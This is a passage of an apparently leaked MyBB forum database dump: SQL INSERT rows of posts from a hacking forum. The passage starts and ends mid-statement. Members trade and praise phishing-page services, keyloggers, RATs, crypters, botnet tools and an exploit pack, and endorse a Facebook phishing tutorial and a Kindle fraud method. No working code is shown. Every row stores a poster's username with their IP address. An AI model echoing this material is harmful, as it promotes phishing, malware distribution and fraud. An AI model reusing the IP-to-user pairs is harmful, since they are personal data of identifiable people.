'41.174.14.146', '699272850', '1', '0', '0', '0', '1', '9b212d31d81449a7c1f4a0f8a794188b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('415', '110', '271', '4', 'RE: It\'s Baws...the Baws', '0', '1', 't3h jok3r', '1345329876', 'DDoS is not hacking but yeah RATTING is a good hacking technique.', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', '6e403ebb946a395638998e32edf58ab4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('416', '110', '271', '4', 'RE: It\'s Baws...the Baws', '0', '5', 'Timmy', '1345329917', 'Welcome to L33T Hacking [s]boss[/s] Baws.', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', 'dc665917cbd5cfa7445019a9ebf234b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('417', '152', '400', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '5', 'Timmy', '1345329977', '[b]1. All downloads must contain a virus scan.[/b] 2. Program must not already be distributed in public forums on LH. 3. Download at your own risk!', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', '92be17c29a373ab3774f79cc10b32642', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('418', '154', '0', '19', '[Junk]New Logo', '0', '1', 't3h jok3r', '1345330348', 'Does the new logo look bad or good? If bad then I will revert back to the old green logo and make it bigger.', '41.174.14.146', '699272850', '1', '0', '1', '1345330567', '1', '9608fbc4cfd0c28597846761b71763ae', '0', '1345330567'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('419', '154', '418', '19', '[Junk]New Logo', '0', '1', 't3h jok3r', '1345330570', 'This thread has been junked.', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('420', '141', '409', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '1', 't3h jok3r', '1345330757', '[quote=\'Baws\' pid=\'409\' dateline=\'1345328738\'] Thanks for the share, I\'ll try this out. Alright I got about 40 points ATM, lol. What sites do you suggest using? I got 7 tabs right now, yahoo-msn-milliondollarhomepage-youtube-aol-ebay [/quote] Aren\'t those 6?', '41.174.14.146', '699272850', '1', '0', '0', '0', '1', 'd09388a8fc16b27cc5a1b7b538a73309', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('421', '117', '296', '46', 'RE: Facebook Phishin* Website [tut]with pictures', '0', '1', 't3h jok3r', '1345330888', 'Thanks for this tutorial. I have made one FB phishing page I belive 2 years ago but never used it. [b]Edited[/b] Forgot to mention. The first time I got hacked on FB was through Phishing.', '41.174.14.146', '699272850', '1', '0', '1', '1345330924', '1', 'f83465010e98e527c8db4d762525bc08', '0', '1345330924'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('422', '145', '407', '30', 'RE: Stealers/Keyloggers', '0', '61', 'NXK', '1345332603', '[quote=\'Baws\' pid=\'407\' dateline=\'1345328525\'] Yeah I don\'t use these, but thanks for the share. Looks like you got lots of programs/files. [/quote] That\'s just my hacking folder ;) over 10 gigs of hacking stuff. Ill be releasing more java drive by\'s, RAT\'s etc', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '5e7e2bb78a151d9148442071fa496d30', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('423', '149', '413', '12', 'RE: How to crack your Internet Download Manager forever', '0', '54', 'Sin Cara', '1345339062', '[quote=\'t3h jok3r\' pid=\'413\' dateline=\'1345329599\'] So does this only work with WIFI or all kinds of internet? [/quote] Works for all kind of internet.', '119.154.16.69', '2006585413', '1', '0', '0', '0', '1', 'd694f75109de8c97840586ff40b8c5eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('424', '152', '417', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '54', 'Sin Cara', '1345339161', '[quote=\'Timmy\' pid=\'417\' dateline=\'1345329977\'] [b]1. All downloads must contain a virus scan.[/b] 2. Program must not already be distributed in public forums on LH. 3. Download at your own risk! [/quote] 1. No need of virus scan. 2. Not available for basic members', '119.154.16.69', '2006585413', '1', '0', '0', '0', '1', 'bd0a02ac572792ac729791c033aadf70', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('425', '153', '401', '34', 'RE: [TUT] How to Render SMOKE and FIRE in Seconds', '0', '54', 'Sin Cara', '1345339495', 'Thanks for the comments :)', '119.154.16.69', '2006585413', '1', '0', '0', '0', '1', '6925ddc0292a8120e4afdbacd502541e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('426', '141', '420', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '55', 'Baws', '1345341766', '[quote=\'t3h jok3r\' pid=\'420\' dateline=\'1345330757\'] [quote=\'Baws\' pid=\'409\' dateline=\'1345328738\'] Thanks for the share, I\'ll try this out. Alright I got about 40 points ATM, lol. What sites do you suggest using? I got 7 tabs right now, yahoo-msn-milliondollarhomepage-youtube-aol-ebay [/quote] Aren\'t those 6? [/quote] Watch out guys, we gotta smartass over here.:D Just kidding babe, what happened is um...I accidentally pressed 7 instead of 6...:shy:', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'b767eccc328dc26ca15fde8e8a9698a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('427', '132', '338', '20', 'RE: [Forever FUD]No Dependency Crypter!', '0', '67', 'HoverCatz', '1345369805', 'Fileice costs real phone $ for me :|', '85.165.36.95', '1436886111', '1', '0', '67', '1345369814', '1', '9701378d8a9bfbf45911c8e0e5eb6f55', '0', '1345369814'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('428', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '0', 'iapple32', '1345375246', 'Not working.It asks you for a \"quick survey\".HAHAHA', '141.237.119.231', '-1913817113', '0', '0', '0', '0', '1', 'e52d576968f9954c9943b6dc3f8c5e7e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('429', '132', '427', '20', 'RE: [Forever FUD]No Dependency Crypter!', '0', '62', 'R?????zo?', '1345376324', '[quote=\'HoverCatz\' pid=\'427\' dateline=\'1345369805\'] Fileice costs real phone $ for me :| [/quote] same here bro, so I can\'t download. Thanks for the share though OP.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e248d41af749a20153f8c3235aa9d80c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('430', '141', '368', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '62', 'R?????zo?', '1345377993', 'Thanks for this, also I\'d love to know what sites you recommend or can I just use like 20 pages of msn and it works?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b58246709106c5e7d73d2ea25a45ad56', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('431', '57', '141', '18', 'RE: Hackyer\'s Email Bomber V1.0', '0', '53', 'sirchamp', '1345392491', 'Reupload please. Thank you', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '5f8225c5fa916d3900bf8cdd828e8cf2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('432', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '67', 'HoverCatz', '1345408651', 'Ill send u a PM with the details :)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '8c871099cdda5b672cecda9cb65ded27', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('433', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '1', 't3h jok3r', '1345415977', 'All suggestions and feedbacks on the new theme are welcome.', '41.174.24.42', '699275306', '1', '0', '0', '0', '1', '604747b555b2067d7e9306eb8916ff9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('434', '155', '0', '3', '[Admin]?????? demoted', '0', '1', 't3h jok3r', '1345416216', 'Earlier on today, an admin (??????) was demoted from their position directly to normal members due to inactivity, I had a conversation they said they are too busy with their own website. I will be starting a search for a new staff member in a day or two. If you guys are interested then simply let us know below and stay active. We will do daily check ups and see who qualifies the most. I currently have someone in mind, they know who I\'m talking about but sometimes there\'re more than 1 :D', '41.174.24.42', '699275306', '1', '0', '0', '0', '1', 'c47d6a52401ad3102dd53421e80daa6f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('435', '129', '332', '8', 'RE: ss501 because i\'m stupid(korean)', '0', '1', 't3h jok3r', '1345416771', '[quote=\'p420\' pid=\'332\' dateline=\'1345143328\'] I\'m not being racist, just curious. Are you Korean? [/quote] I know the OP. The OP is not Korean, sometimes people can like songs from other languages because they like the voice or background music etc.', '41.174.24.42', '699275306', '1', '0', '0', '0', '1', '1503b0913cdf65af041b85c42c1ae498', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('436', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '1', 't3h jok3r', '1345417138', 'Honestly, I didn\'t know I was ever going to need this but this skid wanted to scam me on Skype so I sent him his IP and location and he actually paid me as in a apology.', '41.174.24.42', '699275306', '1', '0', '0', '0', '1', '876def011cb8a41114dedd7bb4b15c05', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('437', '126', '315', '15', 'RE: Adf.ly Bot', '0', '1', 't3h jok3r', '1345417243', 'Thanks for the contribution. I think I had a older version of this adf.ly bot and it use to work but not perfectly. This one boosted my clicks rapidly. **Quick Question: Do we click on the link then click start or just right click>start?', '41.174.24.42', '699275306', '1', '0', '0', '0', '1', '70f86424f9c688376c88fdb9b0d5b712', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('438', '143', '372', '21', 'RE: Tiny flood', '0', '1', 't3h jok3r', '1345417385', 'Moved to Botnets and IRC Bots, Zombies You did post it in the right section before and I moved it here because this section was lacking some good programs such as yours. P.S: If you make one more program and release it, then you will be the first one to get the [b]Dangerous Programmer[/b] award. Good Luck!', '41.174.24.42', '699275306', '1', '0', '0', '0', '1', 'b962bf8cb7e7e4e7ed855a8c028574d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('439', '147', '390', '42', 'RE: [Hacker news] BOTNET -The hacker news magazine', '0', '8', 'spacefish36', '1345417799', 'If their next conference is held in USA, then I would definitely go to the conference other wise not. What about you NXK?', '41.174.60.31', '699284511', '0', '0', '0', '0', '1', '92e4f06c5f5327c003cb681b9dfd8153', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('440', '155', '434', '3', 'RE: [Admin]?????? demoted', '0', '61', 'NXK', '1345418018', 'This is both good and bad news, it\'s sad to see a member go inactive but good to see someone who is new and will be active and HQ take over. Good luck with the search and I hope everything goes Out well.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '712b73c641b353f2148963741b407ad8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('441', '32', '87', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '8', 'spacefish36', '1345419257', 'Easiest and working kindle SEing method I\'ve seen.', '41.174.60.45', '699284525', '0', '0', '0', '0', '1', 'cf1a63d4c73cbcf0ef800fa322b9bf28', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('442', '104', '251', '33', 'RE: Photoshop vs Gimp', '0', '13', 'unixmoon', '1345419493', 'Oh OK. So which version of photoshop should I use?', '41.174.60.45', '699284525', '0', '0', '0', '0', '1', 'fecb52c017733ac5c3ca20415c617f31', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('450', '155', '434', '3', 'RE: [Admin]?????? demoted', '0', '20', 'JakeUS', '1345431559', 'Sucks that he was demoted. And sorry that I was inactive.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '250826dfea43a7970659de255c9ae2b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('451', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '20', 'JakeUS', '1345431693', 'This is a very nice service you\'re doing.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '231c050221318f6bbcc450c0b4bade97', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('452', '110', '271', '4', 'RE: It\'s Baws...the Baws', '0', '20', 'JakeUS', '1345431846', 'Welcome to the site man.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'a93cd39d7d374db6c613a9c04921e3cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('453', '157', '0', '15', 'Eleonore Exp 1.2 Expliot pack', '0', '61', 'NXK', '1345439008', '\'?Eleonore\' is a malware package that contains a collection of exploits used to compromise web pages. When the compromised web pages are viewed via vulnerable systems, the exploit payload is run. Eleonore is purchased by an attacker from an underground website. The attacker then gains access to Internet web servers and installs the exploit by modifying webpages, which are then served to the public. The malware pack also contains functionality for the tracking and management of compromised computers. [img]http://2.bp.blogspot.com/_DVupdUqY77M/TNuEV7xRGhI/AAAAAAAABvE/8dG_QFMo6h8/s1600/eleonore1.jpg[/img] Pretty much all files Are php, Run the builder in sandboxie if you don\'t trust it. (i\'m about to go to bed Ill scan it tomorrow. Post and PM me for this!', '99.253.65.17', '1677541649', '0', '0', '61', '1345595289', '1', '03d3e2cef4d1d8775c4c439bfd25522f', '0', '1345595289'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('454', '152', '447', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '54', 'Sin Cara', '1345450126', '[quote=\'t3h jok3r\' pid=\'447\' dateline=\'1345421614\'] Lol I had the virus scan part on bold to let you know that you need to have a virus scan. Why can\'t it have a virus scan? [/quote] Man its a official software and professional. Don\'t worry :)', '119.154.77.130', '2006601090', '1', '0', '0', '0', '1', 'e89c65499af2fe1e7b8135070236a5bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('455', '126', '315', '15', 'RE: Adf.ly Bot', '0', '53', 'sirchamp', '1345468789', 'You can just press right click start. You dont have to press on the link. Btw you can add as many links as you want :D', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '03c6699ed022ef728edfe59125ffec4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('456', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '53', 'sirchamp', '1345469023', 'Fileice -.- Can I have a survey free link?', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '42484bbcbad3442fd2f2f758c566e164', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('457', '94', '223', '16', 'RE: What is this section about?', '0', '53', 'sirchamp', '1345469119', 'Nearly the exact same text on wikipedia. But thanks anyway :D', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'd7bca680525d568eac09557318cb7682', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('458', '130', '436', '15', 'RE: Skype IP Finder - FREE', '0', '67', 'HoverCatz', '1345470131', '[quote=\'t3h jok3r\' pid=\'436\' dateline=\'1345417138\'] Honestly, I didn\'t know I was ever going to need this but this skid wanted to scam me on Skype so I sent him his IP and location and he actually paid me as in a apology. [/quote] Lmaoo xD', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'f0f40f511d9a1160b2affeb7954376d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('459', '155', '434', '3', 'RE: [Admin]?????? demoted', '0', '1', 't3h jok3r', '1345477501', 'True, but he so-called requested for it. It\'s OK you were inactive, I always contact the staff member if they are inactive because sometimes they are inactive because they sometimes forget the url etc.', '41.151.149.168', '697800104', '1', '0', '0', '0', '1', '16a19163d112b2ca9f6f96c700b20d39', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('460', '158', '0', '42', 'So ninja\'s DO exist?!', '0', '61', 'NXK', '1345478497', 'A 63-year-old engineer is Japan\'s \'last ninja\' A 63-year-old former engineer may not fit the typical image of a dark-clad assassin with deadly weapons who can disappear into a cloud of smoke. But Jinichi Kawakami is reputedly Japan\'s last ninja. As the 21st head of the Ban clan, a line of ninjas that can trace its history back some 500 years, Kawakami is considered by some to be the last living guardian of Japan\'s secret spies. \"I think I\'m called (the last ninja) as there is probably no other person who learned all the skills that were directly\" handed down from ninja masters over the last five centuries, he said. \"Ninjas proper no longer exist,\" he said as he demonstrated the tools and techniques used in espionage and sabotage by men fighting for their samurai lords in the feudal Japan of yesteryear. Nowadays they are confined to fiction or used to promote Iga, some 350 kilometres (220 miles) southwest of Tokyo, a mountain-shrouded city near the ancient imperial capital of Kyoto that was once home to many ninjas. Kawakami, a former engineer who began teaching ninjutsu -- the art of the ninja -- ten years ago, said the true history of ninjas was a mystery. \"There are some drawings of their tools but we don\'t always find all the details,\" which may have been left deliberately vague, Kawakami said. \"Many of their traditions were passed on by word of mouth, so we don\'t know what was altered in the process.\" And those skills that have arrived in the 21st century in their entirety are sometimes difficult to verify. \"We can\'t try out murder or poisons. Even if we can follow the instructions to make a poison, we can\'t try it out,\" he said. Kawakami first encountered the secretive world of ninjas at the age of just six, but has only vague memories of first meeting his master, Masazo Ishida, a man who dressed as a Buddhist monk. \"I kept practising without knowing what I was actually doing. It was much later that I realised I was practising ninjutsu.\" Kawakami said training ranged from physical and mental skills to studies of chemicals, weather and psychology. \"I call ninjutsu comprehensive survival techniques,\" though it originated in war skills such as espionage and guerrilla attacks, he said. \"For concentration, I looked at the wick of a candle until I got the feeling that I was actually inside it. I also practised hearing the sound of a needle dropping on the floor,\" he said. He climbed walls, jumped from heights and learned how to mix chemicals to cause explosions and smoke. \"I was also required to endure heat and cold as well as pain and hunger. The training was all tough and painful. It wasn\'t fun but I didn\'t think much why I was doing it. Training was made to be part of my life.\" Kawakami said he was \"a strange boy\" growing up but his practice drew little attention at a time when many in Japan were struggling to make ends meet in the hard post-war years. Just before he turned 19, he inherited the master\'s title, along with secret scrolls and special tools. Kawakami is careful not to claim the title of the \"last ninja\" for himself and in the sometimes sectarian world of ninjutsu there are doubters and rival claimants, with the disputes centring on the authenticity of various teachings. Kawakami says much of the ninja\'s art lies in catching people unawares, rather than in brute force. \"Humans can\'t be on the alert all the time. There is always a moment when they are off guard and you catch it,\" he said. It is all about exploiting weaknesses that allows the ninja to outfox much bigger or more numerous opponents; distracting attention to allow a quick getaway. It is possible to hide -- in a manner of speaking -- behind the smallest of things, Kawakami said. \"If you throw a toothpick, people will look that way, giving you the chance to flee. \"We also have a saying that it is possible to escape death by perching on your enemy\'s eyelashes; it means you are so close that he cannot see you.\" Kawakami recently began a research job at the state-run Mie University, where he is studying the history of ninjas. But, he said as he showed an AFP team around the Iga-ryu Ninja Museum and its trick house with hidden ladders, fake doors and an underfloor sword box, he is resigned to the fact that he is the last of his kind. There will be no 22nd head of the Ban clan because Kawakami has decided not to take on any more apprentices. \"Ninjas just don\'t fit in the modern day,\" he said. Source http://news.yahoo.com/63-old-engineer-japans-last-ninja-053736959.html', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'e54f2b9bb403b5b24eb31cd969bf8a46', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('461', '159', '0', '49', 'Editing Thread', '0', '53', 'sirchamp', '1345483110', 'I think the admins should make the time you have for editing a thread longer. The time is now i think 2228 minutes and after that you cant edit your own thread anymore.. thats a bit annoying. Thats my opinion. Perhaps some of you think the same :D But besides that the forum is great.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '727c5343eb4f1c0520d794095b248ee8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('462', '160', '0', '9', '$$$Sh@recash Moneymaking$$$', '0', '53', 'sirchamp', '1345486296', '[size=xx-large][color=#006400]Make big Money with Sh@recash!! Money making E-Books.[/size][size=medium] [/color][color=#FF0000]Price: [/color][color=#006400]Free [/color][color=#FF0000]Download: [/color][color=#006400]Mediafire [/color][color=#FF0000][/size][size=large]Why get this E-books:[/size][size=medium] [/color][color=#006400]Easy Money, No hard work, Make a lot of money, free [/color][color=#FF0000][/size][size=large]How to Get:[/size][size=medium][/color][color=#006400]Just press the link below [/color][color=#FF0000]Link: [/color]http://adf.ly/C3ygT [/size][size=xx-large]ENJOY this free package of of ebooks which explain how to make money with sh@recash.[/size]', '188.155.56.90', '-1130678182', '1', '0', '53', '1345486376', '1', 'a591e3fa7f5938f2731c38fe6438a3e5', '0', '1345486376'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, 